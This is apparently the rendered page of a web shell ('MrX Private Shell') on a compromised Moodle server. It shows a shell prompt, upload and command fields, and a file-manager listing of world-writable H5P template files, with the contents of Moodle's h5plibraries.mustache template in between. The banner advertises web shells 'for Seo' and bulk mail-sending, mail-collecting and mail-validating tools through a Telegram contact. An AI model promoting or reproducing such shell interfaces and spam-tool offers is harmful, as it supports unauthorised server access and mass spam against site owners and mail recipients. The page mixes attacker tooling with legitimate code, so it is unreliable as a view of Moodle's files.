__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/

    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core_h5p/h5plibraries

    Example context (json):
    {
        "contenttypes": [
            {
                "title": "Accordion",
                "major_version": 1,
                "minor_version:": 0,
                "patch_version:": 0,
                "runnable": 1,
                "icon": "icon.svg",
                "enabled": true,
                "toggleenabledurl": "http://myserver.cat/h5p/libraries.php?id=26&action=disable"
            },
            {
                "title": "Collage",
                "major_version": 0,
                "minor_version:": 3,
                "patch_version:": 1,
                "runnable": 1,
                "enabled": true,
                "toggleenabledurl": "http://myserver.cat/h5p/libraries.php?id=37&action=disable"
            },
            {
                "title": "FontAwesome",
                "major_version": 4,
                "minor_version:": 5,
                "patch_version:": 0,
                "runnable": 1,
                "icon": "icon.svg",
                "enabled": false,
                "toggleenabledurl": "http://myserver.cat/h5p/libraries.php?id=54&action=enable"
            }
        ]
    }

}}
<h3 class="mt-3">{{#str}} installedh5p, h5p {{/str}}</h3>

<ul class="nav nav-tabs mb-3" id="myTab" role="tablist">
    <li class="nav-item">
        <a class="nav-link active" id="contenttypes-tab" data-toggle="tab" href="#contenttypes" role="tab" aria-controls="contenttypes" aria-selected="true">
            {{#str}} installedcontenttypes, h5p {{/str}}
        </a>
    </li>
    <li class="nav-item">
        <a class="nav-link" id="libraries-tab" data-toggle="tab" href="#libraries" role="tab" aria-controls="libraries" aria-selected="false">
            {{#str}} installedcontentlibraries, h5p {{/str}}
        </a>
    </li>
</ul>
<div class="tab-content" id="myTabContent">
    <div class="tab-pane fade show active" id="contenttypes" role="tabpanel" aria-labelledby="contenttypes-tab">
        <div class="overview px-3 mb-5">
            <table class="admintable generaltable" id="h5pcontenttypes">
                <thead>
                    <tr>
                        <th style="width: 5%">{{#str}}enable, core{{/str}}</th>
                        <th>{{#str}}description, core{{/str}}</th>
                        <th>{{#str}}version, core{{/str}}</th>
                        <th aria-label="{{#str}}actions, core_h5p{{/str}}"></th>
                    </tr>
                </thead>
                <tbody>
                    {{#contenttypes}}
                        {{#runnable}}
                        <tr class="">
                            <td class="text-center">
                            {{#enabled}}
                                <a href="{{{toggleenabledurl}}}" aria-label="{{#str}}disable, core{{/str}}">{{#pix}}t/hide, core,{{#str}}disable{{/str}}{{/pix}}</a>
                            {{/enabled}}
                            {{^enabled}}
                                <a href="{{{toggleenabledurl}}}" aria-label="{{#str}}enable, core{{/str}}">{{#pix}}t/show, core,{{#str}}enable{{/str}}{{/pix}}</a>
                            {{/enabled}}
                            </td>
                            <td>
                                {{#icon}}
                                    <img alt=""
                                         class="icon iconsize-big"
                                         src="{{{ icon }}}">
                                {{/icon}}
                                {{^icon}}
                                    {{#pix}} b/h5p_library, core {{/pix}}
                                {{/icon}}
                                {{{ title }}}
                            </td>
                            <td>{{{ major_version }}}.{{{ minor_version }}}.{{{ patch_version }}}</td>
                            <td>
                                {{#actionmenu}}
                                    {{>core/action_menu}}
                                {{/actionmenu}}
                            </td>
                        </tr>
                        {{/runnable}}
                    {{/contenttypes}}
                </tbody>
            </table>
        </div>
    </div>
    <div class="tab-pane fade" id="libraries" role="tabpanel" aria-labelledby="libraries-tab">
        <div class="overview px-3 mb-5">
            <table class="admintable generaltable" id="h5plibraries">
                <thead>
                    <tr>
                        <th>{{#str}}description, core{{/str}}</th>
                        <th>{{#str}}version, core{{/str}}</th>
                        <th aria-label="{{#str}}actions, core_h5p{{/str}}"></th>
                    </tr>
                </thead>
                <tbody>
                    {{#contenttypes}}
                        {{^runnable}}
                        <tr class="">
                            <td>
                                {{{ title }}}
                            </td>
                            <td>{{{ major_version }}}.{{{ minor_version }}}.{{{ patch_version }}}</td>
                            <td>
                                {{#actionmenu}}
                                    {{>core/action_menu}}
                                {{/actionmenu}}
                            </td>
                        </tr>
                        {{/runnable}}
                    {{/contenttypes}}
                </tbody>
            </table>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
h5pdiv.mustache File 1.02 KB 0777
h5peditor.mustache File 1.25 KB 0777
h5pembed.mustache File 2.36 KB 0777
h5perror.mustache File 2.21 KB 0777
h5piframe.mustache File 1.12 KB 0777
h5plibraries.mustache File 6.08 KB 0777
h5presize.mustache File 1.01 KB 0777
h5ptoolsoverview.mustache File 2.2 KB 0777
Filemanager